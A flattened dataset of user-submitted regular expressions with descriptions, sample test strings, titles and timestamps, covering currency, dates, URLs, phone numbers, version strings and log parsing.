description
stringlengths
0
8.24k
regex
stringlengths
1
26.3k
text
stringlengths
0
2.47M
title
stringlengths
1
150
created_at
stringlengths
24
24
test
\w+
qsdfqsdfqdsfqds
test
2016-08-24T09:02:32.000Z
Matches typical currency input in most LTR locales. Doesn't handle ISO-style currency abbreviations. Currency symbol must be on the left side for consistency; this my conflict with conventions for some currencies. Requested by Mr Lucky at https://xenforo.com/community/threads/help-with-a-currency-regular-expression-please.104164/
(?(DEFINE) (?<currency_symbol> \p{Sc} ) (?<leading_group> [1-9] \d{0,2}+ ) (?<group> \d{3} ) (?<non_leading_groups> (?&group) (?:(?&group_delim)(?&group))*+ ) (?<decimal_delim> (?# Use the opposite of group_delim. ) (?(group_delim_comma) \. | (?(group_delim_period) , | [,.] (?# There's no definitive grouping_delim. ) ) ) ) ) ^ (?> (?&currency_symbol) (?&leading_group) (?: (?<group_delim> (?<group_delim_comma> , ) | (?<group_delim_period> \. ) | \ (?# Allow whitespace as a delimiter. ) ) (?&non_leading_groups) | \d*+ (?# It's also possible that there's no delimiter. ) ) ) (?: (?&decimal_delim) \d*+ )?+ $
We want to match these: $1 $10 $100 $1000 $1,000 $10,000 $100,000 $1,000,000 $1.00 $100.00 $10,000.00 $1,000,000.00 $1.000.000,00 $1.000 $1.000.000 $1,00 $1.000,00 $10000000000000 We don't want to match these: $1,000,00 $1,00,00 $1.00.000 A few different currency symbols that we want to match: $1 ¢1 £1 ¤1 ¥1 ₠1 ₡1 ₢1 ₣1 ₤1 ₥1 ₦1 ₧1 ₩1 ₪1 ₫1 €1 ₭1 ₮1 ₯1 ₰1 ₱1 ₲1 ₳1 ₴1 ₵1 ₶1 ₷1 ₸1 ₹1 ₺1 ₻1 ₼1 ₽1 Nearby symbols that share some bytes (UTF-8) that we don't want to match: ¡1 ¦1 §1 ©1 ₔ1
Advanced Currency Matcher/Validator
2015-09-26T11:36:34.000Z
bla
rvewr
2015-01-27T12:00:32.000Z
AssemblyVersion\("([a-zA-Z0-9.-_]+)"\)
AssemblyVersion\("([a-zA-Z0-9.-_]+)"\)
using System.Reflection; using System.Runtime.InteropServices; // // General Information about an assembly is controlled through the following // set of attributes. Change these attribute values to modify the information // associated with an assembly. // [assembly: AssemblyTitle("Razor Enhanced")] [assembly: AssemblyDescription("The bleeding edge UO tool")] [assembly: AssemblyConfiguration("")] [assembly: AssemblyCompany("www.razorenhanced.net")] [assembly: AssemblyProduct("Razor Enhanced")] [assembly: AssemblyCopyright("")] [assembly: AssemblyTrademark("")] [assembly: AssemblyCulture("")] // // Version information for an assembly consists of the following four values: // // Major Version // Minor Version // Build Number // Revision // // You can specify all the values or you can default the Revision and Build Numbers // by using the '*' as shown below: [assembly: AssemblyVersion("0.7.7.19")] // // In order to sign your assembly you must specify a key to use. Refer to the // Microsoft .NET Framework documentation for more information on assembly signing. // // Use the attributes below to control which key is used for signing. // // Notes: // (*) If no key is specified, the assembly is not signed. // (*) KeyName refers to a key that has been installed in the Crypto Service // Provider (CSP) on your machine. KeyFile refers to a file which contains // a key. // (*) If the KeyFile and the KeyName values are both specified, the // following processing occurs: // (1) If the KeyName can be found in the CSP, that key is used. // (2) If the KeyName does not exist and the KeyFile does exist, the key // in the KeyFile is installed into the CSP and used. // (*) In order to create a KeyFile, you can use the sn.exe (Strong Name) utility. // When specifying the KeyFile, the location of the KeyFile should be // relative to the project output directory which is // %Project Directory%\obj\<configuration>. For example, if your KeyFile is // located in the project directory, you would specify the AssemblyKeyFile // attribute as [assembly: AssemblyKeyFile("..\\..\\mykey.snk")] // (*) Delay Signing is an advanced option - see the Microsoft .NET Framework // documentation for more information on this. // [assembly: AssemblyDelaySign(false)] //[assembly: AssemblyKeyFile("")] //[assembly: AssemblyKeyName("")] [assembly: ComVisibleAttribute(false)]
AssemblyVersion\("([a-zA-Z0-9.-_]+)"\)
2021-05-06T21:28:14.000Z
\B\.\w+,? ?
ad, ghost, hg, .hi, jk, find.jpg, dam.ark, haji, jive.pdf, .find, home, .war, .milk, raj, .ker
Remove words starting with a dot in a comma separated word list
2018-03-27T11:58:07.000Z
^\/(training|en-gb\/training|en-za\/training|en-us\/training|en-es\/training|es-es\/formaciones)(\/pub\/media\/.*)$
/en-us/training/pub/media/spotlights/default/spotlight.jpg
jftr
2019-07-24T16:05:07.000Z
^<(JeEntity|JeFeld)>
#region Satz-Definitionen <JeEntity> public class «EntityName»_Satz { #region constructor public «EntityName»_Satz() { } #endregion <JeFeld> public «FeldTyp» «FeldNameCSharp» { get; set; } </JeFeld> } </JeEntity> #endregion }
EntityFeld
2019-11-26T21:17:33.000Z
Test regex for sample page from census of industrial production
^\s*(?<recno>\(\d+\))\s+([^\d]+)\s+(?<r1_date>\d{4})\s+(?<r1_total>[\d,.]+)\s+(?<r1_salaries>[\d,.]+)\s+(?<r1_wagesearnings>[\d,.]+)\s+(?<r1_totalpersonsemployed>[\d,.]+)\s+(?<r1_proprietors>[\d,.]+)\s+(?<r1_salaried>[\d,.]+)\s+(?<r1_waged>[\d,.]+)\s+(?<r2_date>\d{4})\s+(?<r2_total>[\d,.]+)\s+(?<r2_salaries>[\d,.]+)\s+(?<r2_wagesearnings>[\d,.]+)\s+(?<r2_totalpersonsemployed>[\d,.]+)\s+(?<r2_proprietors>[\d,.]+)\s+(?<r2_salaried>[\d,.]+)\s+(?<r2_waged>[\d,.]+)\s*$
(1) Bacon curing, 1936 397.457 130,420 267,028 2,563 28 543 1,992 1937 409,372 136,613 272,759 2,611 33 563 2,015 (2) Butter, cheese, condensed milk and margarine. 1936 388,214 170,980 217,234 3,338 33 933 2,372 1937 416,667 180,797 235,870 3,409 29 922 2,458 (3) Grain milling. 1936 617,310 207,082 410,228 4,109 72 897 3,140 1937 635,268 216,499 418,769 4,145 72 920 3,153 (4) Malting. 1936 115,628 35,070 80,558 758 18 119 621 1937 112,677 37,994 74,683 746 14 123 609 (5) Bread, flour confectionery and biscuits. 1936 1,129,320 187,578 941,742 7,928 375 929 6,624 1937 1,112,996 178,651 934,345 7,832 387 895 6,550 (6) Sugar, sugar confectionery, jam making, etc. 1936 596,512 177,945 418,567 4,977 40 749 4,188 1937 601,014 187,205 413,809 4,954 52 748 4,154 (7) Aerated and mineral waters. 1936 101,073 32,713 68,360 1,055 53 254 748 1937 106,430 33,339 73,091 1,123 46 262 815 (8) Brewing. 1936 934,460 336,296 598,164 3,951 1 805 3,145 1937 923,513 325,675 597,838 3,985 795 3,189 (9) Distilling. 1936 85,975 40,096 45,879 411 117 294 1937 93,026 41,247 51,779 454 119 335 (10) Tobacco. 1936 361,204 149,930 211,274 2,321 11 487 1,823 1937 375,126 158,526 216,600 2,361 7 506 1,848 (11) Bricks, pottery, glass and monumental masonry. 1936 257,30(3 42,398 214,998 2,500 109 238 2,169 1937 287,218 46,860 240,358 2,608 115 235 2,258 (12) Building and construction. 1936 2,317,960 134,998 2,182,962 18,207 687 698 10,822 1937 1,930,419 129,703 1,800,716 15,009 718 716 13,575 (13) Timber. 1936 435,382 61,975 373,407 3,507 108 349 3,050 1937 442,864 61,808 381,056 3,331 115 337 2,882 (14) Brushes and brooms. 1936 41,883 6,565 35,318 467 24 60 383 1937 41,210 5,206 35,914 465 27 52 386 (15) Wood furniture and upholstery. 1936 301,657 42,478 259,179 2,795 141 251 1937 315,820 44,111 271,709 2,754 147 211 2,366 (16) Assembly, construction and repair of vehicles. 1930 573,406 98,806 474,600 3,850 461 3,294 1937 612,268 110,733 501,535 4,183 113 506 3,564 (17) Metal. 1936 438,566 82,145 356,115 4,2.11) 108 484 3,657 1937 511,344 92,521 418,823 •1,46(1 107 618 3,8-11 (18) Engineering and Implements. 1936 202,535 70,909 221,626 2,►10 66 383 2,070 1037 330,907 81,463 246,444 2,791 63 411 2,317 (19) linen, cotton, jute and canvas, 1936 208,518 37,007 170,521 2,850 311 179 2,6:12 (20) Woollen and worsted. 1937 237,721 43,654 1111,067 2,913 36 1 110 2,717 1030 264,730 53,122 211,608 :3,170 31 240 2,890 1937 70,956 48,058 222,898 3,066 37 228 2,801 Svc Tablo
Census of Industrial Production
2018-04-26T15:36:58.000Z
gaming pass fail shortcut
\[(?<prefix>.*:)?\s*(?<expr>((?<left>.*?)\s*(@|[Dd][Cc])\s*(?<test>(?<right>.*?)\]))|(?<data>.*)\]\s*(?=\())\s*(\((?<fail>(.*?))\/(?<pass>.*?)\))?
[Prevent Fall (1min): STR DC 12](swept downstream to [room L]/able to reach edge) [Hide DC 12] to escape the run [Hide@12] to escape the run [1 min: Armor Rating DC STR-5](swept downstream to [room L]/able to reach edge) [Hide 12] to escape the run [Room L] [1min: STR DC 12](swept downstream to [room L]/able to reach edge) [1 min: STR-Armor Rating DC 5](swept downstream to [room L]/able to reach edge) [12 hr: STR@12](swept downstream to [room L]/able to reach edge) How does one [WIS@15](fail info/pass info 1) [ssdsd + 22](i'm failing/oh good) [ssdsd](-/ds) [ssdsd](player is Incapacitated for 1d4 rounds/-) [Con](sleep for 1d6x10 minutes/-) [Dex](2d6 damage/half) [CON](lose 1hp every minute/-) [STR](-/upward thrust dislodges debris - critical: door opens) [DEX](slide down to pit/-) [level 2 - room T] [CON-Armor Rating](1d8 damage/-) [STR-Armor Rating](swept downstream to [room L]/able to reach edge) [Dex](-/pull up bracelet with chain) [paralyze](paralyzed 3d6 turns/-) [wis](cannot understand/-) [poison](unconscious 1d6 turns/-)
Pass/Fail
2023-01-10T04:02:13.000Z
Search a string for PHP-like variables starting with $, containing an unlimited number of non-whitespace characters and ending with a word boundary of any kind
\$([\S]+)\b
Local $residents o1__have called g__in o22__with reports...,u Local ,residents o1__have called g__in o22__with reports...$u Local ,residents o1__have called g__in o22__with reports...,u Local ,residents o1__have called g__in o22__with reports...,u Local $residents o1__have called g__in o22__with reports...,u Local ,residents o1__have called g__in o22__with reports...$u
Find PHP-like variables
2015-09-26T19:33:24.000Z
Perfect Date validator from 1900-01-01 to 2013-12-31, all with leap years and perfect dates.
^((([1][9][0|2|4|6|8][0|4|8]|[1][9][1|3|5|7|9][2|6]|[2][0][0][0|4|8]|[2][0][1][2])[-|\\|\/|\.]([1][1-2]|[0][1|3|5|7|8])[-|\\|\/|\.]([0][1-9]|[1][0-9]|[2][0-9]|[3][0-1])|([1][9][0|2|4|6|8][0|4|8]|[1][9][1|3|5|7|9][2|6]|[2][0][0][0|4|8]|[2][0][1][2])[-|\\|\/|\.][0][2][-|\\|\/|\.]([0][1-9]|[1][0-9]|[2][0-9])|([1][9][0|2|4|6|8][0|4|8]|[1][9][1|3|5|7|9][2|6]|[2][0][0][0|4|8]|[2][0][1][2])[-|\\|\/|\.]([1][1]|[0][4|6|9])[-|\\|\/|\.]([0][1-9]|[1][0-9]|[2][0-9]|[2][0]))|(([1][9][0|2|4|6|8][1|2|3|5|6|7|9]|[1][9][1|3|5|7|9][0|1|3|4|5|7|8|9]|[2][0][0][1|2|3|5|6|7|9]|[2][0][1][0|1|3])[-|\\|\/|\.]([1][1-2]|[0][1|3|5|7|8])[-|\\|\/|\.]([0][1-9]|[1][0-9]|[2][0-9]|[3][0-1])|([1][9][0|2|4|6|8][1|2|3|5|6|7|9]|[1][9][1|3|5|7|9][0|1|3|4|5|7|8|9]|[2][0][0][1|2|3|5|6|7|9]|[2][0][1][0|1|3])[-|\\|\/|\.][0][2][-|\\|\/|\.]([0][1-9]|[1][0-9]|[2][0-8])|([1][9][0|2|4|6|8][1|2|3|5|6|7|9]|[1][9][1|3|5|7|9][0|1|3|4|5|7|8|9]|[2][0][0][1|2|3|5|6|7|9]|[2][0][1][0|1|3])[-|\\|\/|\.]([1][1]|[0][4|6|9])[-|\\|\/|\.]([0][1-9]|[1][0-9]|[2][0-9]|[2][0])))$
2012-02-29
Date Validator Regular Expression
2014-06-04T11:46:10.000Z
This ensures that a link to tweet strictly matches
((https?):\/\/)?(www.)?twitter\.com(\/@?(\w){1,15})\/status\/[0-9]{19}\?
https://twitter.com/PetsDrawn/status/1516129999434436609?s=20&t=rH3i0GUrTKOgp_ryRlE9DA
Twitter Tweet URL
2022-04-18T23:00:04.000Z
Added new combatant (クロック・ミテーヌ|ケロゲロス|ガーロック|ボナコン|ナンディ|チェルノボーグ|レドロネット|ウルガル|マインドフレア|サウザンドキャスト・セダ|ゾーナ・シーカー|ブロンテス|バルウール|ヌニュヌウィ|ミニョーカオン|サファト|アグリッパ|カイザーベヒーモス|極楽鳥|ガンダルヴァ|セーンムルウ|ペイルライダー|レウクロッタ)
Added new combatant (クロック・ミテーヌ|ケロゲロス|ガーロック|ボナコン|ナンディ|チェルノボーグ|レドロネット|ウルガル|マインドフレア|サウザンドキャスト・セダ|ゾーナ・シーカー|ブロンテス|バルウール|ヌニュヌウィ|ミニョーカオン|サファト|アグリッパ|カイザーベヒーモス|極楽鳥|ガンダルヴァ|セーンムルウ|ペイルライダー|レウクロッタ)Jessip Daggerheart is attempting to sneak up on (?<Player>\w+)
You use Blood for Blood.
Sランク
2016-06-10T08:22:52.000Z
(#endif\W+){1}$
test #endif void func() { }
match only an #endif where no wordcharacter is following(multiline)
2015-04-10T14:21:46.000Z
Find all href in a tag
<a.+?\s*href\s*=\s*["\']?([^"\'\s>]+)["\']?
All href in a tag
2013-12-03T11:50:40.000Z
"y".*\[\s?(\d*)\s?,
"y": [15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15]
ol fix1
2016-01-07T21:50:07.000Z
^\d{1,5}(\.\d{1,2})?$
1 1.1 11 11.11 111 1111 11111 99999 100000 99999.99 100000.0 100000.0 999999
identify values lower than 100000
2019-12-02T19:13:04.000Z
E.g. android version name or ios bundle id validation
^(\d+\.?)(\d+\.)?(\S+)?$
1.0.0-debug
Version number validation
2017-03-07T15:40:27.000Z
\w+\s\w+\s\w+\.\s\w+\.\w+
Draft Contract Mr. Yamamoto.txt
random1
2018-08-02T04:03:13.000Z
A well-documented, easy to modify bulletproof regular expression that matches complete URLs or URL components. Components include: ## Schema - **scheme/protocol**: use an OR statement to add FTP, etc. - **hostname**: use OR statements to more TLDs - **port**: matches leading zero; to disable, change the first block in the subexpression to **`[1-9]`** from `[0-9]` - **path** - **query**: to capture subcomponents of the query string, delete the target symbol in the `<?QUERY>` subexpression - **fragment** ☛ The name of the captured subexpression is usually case-sensitive. ## Substitution ### Complete URL `${URL}`, `\1`, or its equivalent, can be used to backreference or substitute the complete URL. - `\1` - `$1` - `${URL}` - `$+{URL}` ### URL Component Map ```regexp ${SCHEME} → \2 ${HOSTNAME} → \3 ${PORT} → \4 ${PATH} → \5 ${QUERY} → \6 ${FRAGMENT} → \7 ``` Plug & Play substitution/backreference alternatives - `\2\3\4\5\6\7` - `$2$3$4$5$6$7` - `${2}${3}${4}${5}${6}${7}` - `${SCHEME}${HOSTNAME}${PORT}${PATH}${QUERY}${FRAGMENT}` - `$+{SCHEME}$+{HOSTNAME}$+{PORT}$+{PATH}$+{QUERY}$+{FRAGMENT}`
((?<SCHEME>(?:https?))(?<HOSTNAME>\:\/\/(?:www.|[a-zA-Z.]+)[a-zA-Z0-9\-\.]+\.(?:biz|ca|com|edu|gov|info|me|mil|museum|name|net|org|uk|ru|us))?(?<PORT>\:[0-9][0-9]{0,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])?(?<PATH>[a-zA-Z0-9\-\.\/]+)?(?<QUERY>(?:\?$|[a-zA-Z0-9\.\,\;\?\'\\\+&%\$\=~_\-\*]+))?(?<FRAGMENT>#[a-zA-Z0-9\-\.]+)?)
https://ok.ru/video/1933507299866\ https://st.mycdn.me/static/MegaPlayer/10-10-15/vp11.swf https://st.mycdn.me/static/MegaPlayer/10-10-15/vp11.swf https://st.mycdn.me/static/MegaPlayer/10-10-15/vp11.swf https://st.mycdn.me/static/MegaPlayer/10-10-15/vp11.swf#bar https://st.mycdn.me:8080/static/MegaPlayer/10-10-15/vp11.swf https://vd228.mycdn.me/video.m3u8?cmd=videoPlayerCdn\&expires=1603029953276\&srcIp=45.72.158.150\&srcAg=CHROME_MAC\&ms=45.136.22.36\&type=4\&sig=y0vE2rzzobQ\&ct=8\&urls=185.226.52.15\&clientType=0\&id=871343327770\#bar https://vd228.mycdn.me:08080/video.m3u8?cmd=videoPlayerCdn\&expires=1603029953276\&srcIp=45.72.158.150\&srcAg=CHROME_MAC\&ms=45.136.22.36\&type=4\&sig=y0vE2rzzobQ\&ct=8\&urls=185.226.52.15\&clientType=0\&id=871343327770\ https://vd228.mycdn.me:65535/video.m3u8?cmd=videoPlayerCdn\&expires=1603029953276\&srcIp=45.72.158.150\&srcAg=CHROME_MAC\&ms=45.136.22.36\&type=4\&sig=y0vE2rzzobQ\&ct=8\&urls=185.226.52.15\&clientType=0\&id=871343327770\#bar https://www.ok.ru/video/1933507299866\ https://www.st.mycdn.me:8080/static/MegaPlayer/10-10-15/vp11.swf {"playerId":"VideoPopup_player_1933507299866","width":"491","height":"275","notifyEnabled":true,"url":"https://st.mycdn.me/static/MegaPlayer/10-10-15/vp.swf","url11":"https://st.mycdn.me/static/MegaPlayer/10-10-15/vp11.swf","html5url":"//st.mycdn.me/static/MegaPlayer/10-11-48/okHtml5Player.min","minFlashVersionNewPlayer":"11.2","wmode":"opaque","asa":true,"provider":"UPLOADED_ODKL","flashvars":{"metadata":"{\"provider\":\"UPLOADED_ODKL\",\"service\":\"ok\",\"owner\":false,\"voted\":false,\"likeCount\":0,\"compilation\":\"/video/u584317172506\",\"compilationIcon\":\"https://i.mycdn.me/i?r=AyH4iRPQ2q0otWIFepML2LxRB2ZYlo6jxlcEFP-saJ0pqQ\&fn=external_37\",\"compilationTitle\":\"kkl llkl\",\"subscribed\":false,\"isWatchLater\":false,\"slot\":0,\"siteZone\":-1,\"showAd\":false,\"fromTime\":0,\"author\":{\"id\":\"584317172506\",\"name\":\"kkl llkl\",\"profile\":\"/profile/584317172506\"},\"movie\":{\"id\":\"1933507299866\",\"movieId\":\"1933507299866\",\"likeId\":\"1933507299866\",\"contentId\":\"871343327770\",\"poster\":\"https://i.mycdn.me/image?id=901988403482\&t=50\&plc=WEB\&tkn=*jPyM1qPbv78PmldGCrieh4CBs0M\&fn=external_8\",\"duration\":\"6187\",\"title\":\"Bellator 249 Cyborg vs. Blencowe 15.10.2020\",\"url\":\"https://ok.ru/video/1933507299866\",\"link\":\"/video/1933507299866\",\"collageInfo\":{\"url\":\"https://i.mycdn.me/i?r=AEE-HZfz734vGAKlsp5gLh-pXkOCAc9uGRAuj-Fg9ZPA6pV4V1xszwgl7Ejk2zBoOpjKJLHsazBXODze0CkTvfuB\",\"frequency\":30,\"height\":44,\"width\":80,\"count\":207},\"status\":\"OK\",\"statusText\":\"OK\",\"isLive\":false,\"notPublished\":false},\"admanMetadata\":{},\"partnerId\":0,\"ownerMovieId\":\"1933507299866\",\"alwaysShowRec\":false,\"videos\":[{\"name\":\"mobile\",\"url\":\"https://vd197.mycdn.me/?expires=1603029953276\&srcIp=45.72.158.150\&srcAg=CHROME_MAC\&ms=45.136.22.5\&type=4\&sig=mKQrU8OnPTw\&ct=0\&urls=185.226.52.6\&clientType=0\&id=871343327770\",\"seekSchema\":3,\"disallowed\":false},{\"name\":\"lowest\",\"url\":\"https://vd197.mycdn.me/?expires=1603029953276\&srcIp=45.72.158.150\&srcAg=CHROME_MAC\&ms=45.136.22.5\&type=0\&sig=ARTJV770C5I\&ct=0\&urls=185.226.52.6\&clientType=0\&id=871343327770\",\"seekSchema\":3,\"disallowed\":false},{\"name\":\"low\",\"url\":\"https://vd197.mycdn.me/?expires=1603029953276\&srcIp=45.72.158.150\&srcAg=CHROME_MAC\&ms=45.136.22.5\&type=1\&sig=nXHUGGVVpNs\&ct=0\&urls=185.226.52.6\&clientType=0\&id=871343327770\",\"seekSchema\":3,\"disallowed\":false},{\"name\":\"sd\",\"url\":\"https://vd197.mycdn.me/?expires=1603029953276\&srcIp=45.72.158.150\&srcAg=CHROME_MAC\&ms=45.136.22.5\&type=2\&sig=2Xv_2PDsVRo\&ct=0\&urls=185.226.52.6\&clientType=0\&id=871343327770\",\"seekSchema\":3,\"disallowed\":false}],\"metadataEmbedded\":\"\<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?\>\<MPD xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns=\\\"urn:mpeg:DASH:schema:MPD:2011\\\" xsi:schemaLocation=\\\"urn:mpeg:DASH:schema:MPD:2011\\\" type=\\\"static\\\" mediaPresentationDuration=\\\"PT6187.768S\\\" minBufferTime=\\\"PT0.5S\\\" profiles=\\\"urn:mpeg:dash:profile:isoff-on-demand:2011\\\"\>\<Period id=\\\"0\\\" start=\\\"PT0S\\\" duration=\\\"PT6187.768S\\\"\>\<AdaptationSet id=\\\"0\\\" segmentAlignment=\\\"true\\\" subsegmentAlignment=\\\"true\\\" subsegmentStartsWithSAP=\\\"1\\\"\>\<Representation id=\\\"0\\\" bandwidth=\\\"107768\\\" width=\\\"256\\\" height=\\\"140\\\" quality=\\\"mobile\\\" frameRate=\\\"25\\\" codecs=\\\"avc1.4D400C,mp4a.40.2\\\" audioSamplingRate=\\\"44100\\\" mimeType=\\\"video/mp4\\\" startWithSAP=\\\"1\\\"\>\<BaseURL\>https://vd197.mycdn.me/?expires=1603029953276\&amp;srcIp=45.72.158.150\&amp;srcAg=CHROME_MAC\&amp;ms=45.136.22.5\&amp;type=4\&amp;sig=mKQrU8OnPTw\&amp;ct=4\&amp;urls=185.226.52.6\&amp;clientType=0\&amp;id=871343327770\</BaseURL\>\<SegmentBase indexRange=\\\"1348-6275\\\"\>\<Initialization range=\\\"0-1347\\\"/\>\</SegmentBase\>\</Representation\>\<Representation id=\\\"1\\\" bandwidth=\\\"307486\\\" width=\\\"426\\\" height=\\\"234\\\" quality=\\\"lowest\\\" frameRate=\\\"25\\\" codecs=\\\"avc1.4D4015,mp4a.40.2\\\" audioSamplingRate=\\\"44100\\\" mimeType=\\\"video/mp4\\\" startWithSAP=\\\"1\\\"\>\<BaseURL\>https://vd197.mycdn.me/?expires=1603029953276\&amp;srcIp=45.72.158.150\&amp;srcAg=CHROME_MAC\&amp;ms=45.136.22.5\&amp;type=0\&amp;sig=ARTJV770C5I\&amp;ct=4\&amp;urls=185.226.52.6\&amp;clientType=0\&amp;id=871343327770\</BaseURL\>\<SegmentBase indexRange=\\\"1349-6276\\\"\>\<Initialization range=\\\"0-1348\\\"/\>\</SegmentBase\>\</Representation\>\<Representation id=\\\"2\\\" bandwidth=\\\"648870\\\" width=\\\"640\\\" height=\\\"352\\\" quality=\\\"low\\\" frameRate=\\\"25\\\" codecs=\\\"avc1.4D401E,mp4a.40.2\\\" audioSamplingRate=\\\"44100\\\" mimeType=\\\"video/mp4\\\" startWithSAP=\\\"1\\\"\>\<BaseURL\>https://vd197.mycdn.me/?expires=1603029953276\&amp;srcIp=45.72.158.150\&amp;srcAg=CHROME_MAC\&amp;ms=45.136.22.5\&amp;type=1\&amp;sig=nXHUGGVVpNs\&amp;ct=4\&amp;urls=185.226.52.6\&amp;clientType=0\&amp;id=871343327770\</BaseURL\>\<SegmentBase indexRange=\\\"1349-6276\\\"\>\<Initialization range=\\\"0-1348\\\"/\>\</SegmentBase\>\</Representation\>\<Representation id=\\\"3\\\" bandwidth=\\\"1156072\\\" width=\\\"852\\\" height=\\\"470\\\" quality=\\\"sd\\\" frameRate=\\\"25\\\" codecs=\\\"avc1.4D401E,mp4a.40.2\\\" audioSamplingRate=\\\"44100\\\" mimeType=\\\"video/mp4\\\" startWithSAP=\\\"1\\\"\>\<BaseURL\>https://vd197.mycdn.me/?expires=1603029953276\&amp;srcIp=45.72.158.150\&amp;srcAg=CHROME_MAC\&amp;ms=45.136.22.5\&amp;type=2\&amp;sig=2Xv_2PDsVRo\&amp;ct=4\&amp;urls=185.226.52.6\&amp;clientType=0\&amp;id=871343327770\</BaseURL\>\<SegmentBase indexRange=\\\"1352-6279\\\"\>\<Initialization range=\\\"0-1351\\\"/\>\</SegmentBase\>\</Representation\>\</AdaptationSet\>\</Period\>\</MPD\>\",\"metadataUrl\":\"https://vd197.mycdn.me/?expires=1603029953276\&srcIp=45.72.158.150\&srcAg=CHROME_MAC\&ms=45.136.22.5\&type=1\&sig=nXHUGGVVpNs\&ct=6\&urls=185.226.52.6\&clientType=0\&id=871343327770\",\"hlsManifestUrl\":\"https://vd228.mycdn.me/video.m3u8?cmd=videoPlayerCdn\&expires=1603029953276\&srcIp=45.72.158.150\&srcAg=CHROME_MAC\&ms=45.136.22.36\&type=4\&sig=y0vE2rzzobQ\&ct=8\&urls=185.226.52.15\&clientType=0\&id=871343327770\",\"failoverHosts\":[\"vd256.mycdn.me\"],\"autoplay\":{\"autoplayEnabled\":true,\"timeFromEnabled\":true,\"noRec\":false,\"fullScreenExit\":false,\"vitrinaSection\":\"recommended_movie\"},\"security\":{\"url\":\"https://vd197.mycdn.me/usr_login\",\"cookie\":\"vdsig\"},\"p2pInfo\":{\"isPeerEnabled\":false,\"ubsc\":0,\"pbsc\":0,\"mptpc\":0,\"pctmt\":0,\"pbesc\":0,\"prrt\":0,\"srt\":0,\"swrt\":0,\"dctt\":0},\"stunServers\":[{\"urls\":[\"stun:videostun.mycdn.me\"]}],\"pins\":[]}","saveLastPlayingTimeFrom":"30","castId":"559D7832","autoplayEnabled":"1","locale":"en","noChatLikes":"1","noChannel":"1","webmSec":"20","enabledLocalStorage":"1","minCacheTime":"120","isLayer":"1","maxCachePartOfDurationMQ":"30","checkMQ":"1","noTrailer":"1","showNext":"1","noLikeButton":"1","maxCachePartOfDuration":"10","isAnonym":"1","jidx":"1","noOkliveBanner":"1","minCacheTimeMQ":"20","ldChunk":"2000","ldBuffer":"6000","feedAdLogic":"15,3,3,14400","location":"AutoplayLayerMovieRBlock/anonymVideo/anonym","adLogic":"15,0,3,14400","checkAutoplayBrowsers":"safari,chrome,opera,yandex,firefox"},"liveRertyTimeout":5000,"poster":"https://i.mycdn.me/image?id=901988403482&t=50&plc=WEB&tkn=*jPyM1qPbv78PmldGCrieh4CBs0M&fn=external_8","isExternalPlayer":false,"isIframePlayer":false,"isHtml5Player":true,"timestamp":"1602943553510","stubEnabled":false,"verifyInline":false,"webrtcBrokenH264":false}
A 'Bulletproof' URL Regular Expression Parser
2020-10-17T20:54:32.000Z
Encontra o valor do capital social de uma empresa.
(?i)(?m)(?<=social )(\d+((?:[.,\s]\d{3})*)((?:[.,]\d{2})?))
Capital Social
2017-05-31T08:41:45.000Z
(\d{2,10}-?){2,3}\d{2,10}(\d{2})?
Policy N
2019-09-09T06:49:17.000Z
Validates US and International. Spaces, dot or dash separator. Optional () These formats and variations of them pass this validation 1 (800) 888 8078 +1 402.536.4184 ext 8862088 +91.986.964.4357 +972546790128 +972 (0) 74-745-4014
^(\+?(([0-9]){1,2})[- .]|\+?([0-9]{1,15}))?((((\(?([0-9]){2,3}\)?)[- .]){1,2}([0-9]{4,10}))|([0-9]{10}))s*(?:\s*(?:#|x\.?|ext\.?|ex\.)\s*(\d+\s*?))?$
1 800 888 8078 +1 402.536.4184 ext 8862088 +91.986.964.4357 +972546790128 +972(0)74-745-4014
Phone validation
2018-08-27T15:11:54.000Z
^\d{1,2}([ -.\/])(\d{1,2}|[a-zA-z]{3,15})(?1)\d{2,4}( \d{2}:\d{2}(:\d{2}([.:]\d)?)?)?$|^(\d{1,2}|[a-zA-z]{3,15})([ -.\/])\d{1,2}(?7)\d{2,4}( \d{2}:\d{2}(:\d{2}([.:]\d)?)?)?$|^\d{2,4}([ -.\/])(\d{1,2}|[a-zA-z]{3,15})\d{1,2}(?11)( \d{2}:\d{2}(:\d{2}([.:]\d)?)?)?$
23/02/1993 23-02/1993 23-fev-1993 fev-23-1993 fev.02.93 28-OCT-90 28-OCT-1990 10/28/90 10/28/1990 28.10.90 dd.mm.yyyy 28.10.1990 90/10/28 yyyy/mm/dd 1990/10/28 4 Q 1990 OCT 90 OCT 1990 01:02 01:02:34.75 02:34 02:34.75 20 08:03 20 08:03:00 20-JUN-1990 08:03 20-JUN-1990 08:03:00 1990-06-20 08:03 1990-06-20 08:03:00.0
Date time recognition
2020-07-14T23:55:52.000Z
^0([1-9]{2})([1-9]{2})([2-3]{1})([0-9]{3})([0-9]{4})$|([1-9]{2})([2-3]{1})([0-9]{3})([0-9]{4})$
0157436211982
Fixo LDN CSP e SEM CSP
2014-11-18T14:02:51.000Z
Extract first string parameter from zend view translate helper method
translate\(\'([^)]*)\',
<div class="row"> <div class="col-md-12"> <div class="content-title"><?php echo $this->translate('Contattaci'); ?></div> <?php if ( $this->messageProcessed && $this->sendError ): ?> <div class="alert alert-danger"> <h4><span class="glyphicon glyphicon-exclamation-sign"></span> <?php echo $this->translate('Errore Invio Messaggio'); ?></h4> <?php echo $this->translate('Spiacenti, si &eacute; verificato un errore durante l&rsquo;invio del messaggio'); ?>. <p class="error"><?php echo $this->sendError; ?></p> </div> <?php elseif ( $this->messageProcessed & !$this->sendError ): ?> <div class="alert alert-success"> <h4><span class="glyphicon glyphicon-ok-circle"></span> <?php echo $this->translate('Messaggio Inviato'); ?></h4> <?php echo $this->translate('Grazie per il tuo messaggio. Risponderemo nel pi&uacute; breve tempo possibile'); ?>. </div> <?php else: ?> <div class="well well-sm"> <?php echo $this->translate('Compila il modulo seguente per inviarci un tuo messaggio.'); ?><br /> <?php echo $this->translate('Sarà nostra premura rispondere nel minor tempo possibile per fornirti tutte le informazioni di cui puoi necessitare.'); ?> </div> <?php if ( $this->getSetting('site_phone') ): ?> <div class="alert alert-info alert-dismissable"> <button aria-hidden="true" data-dismiss="alert" class="close" type="button">×</button> <span class="glyphicon glyphicon-info-sign"></span> <?php echo $this->translate('Se 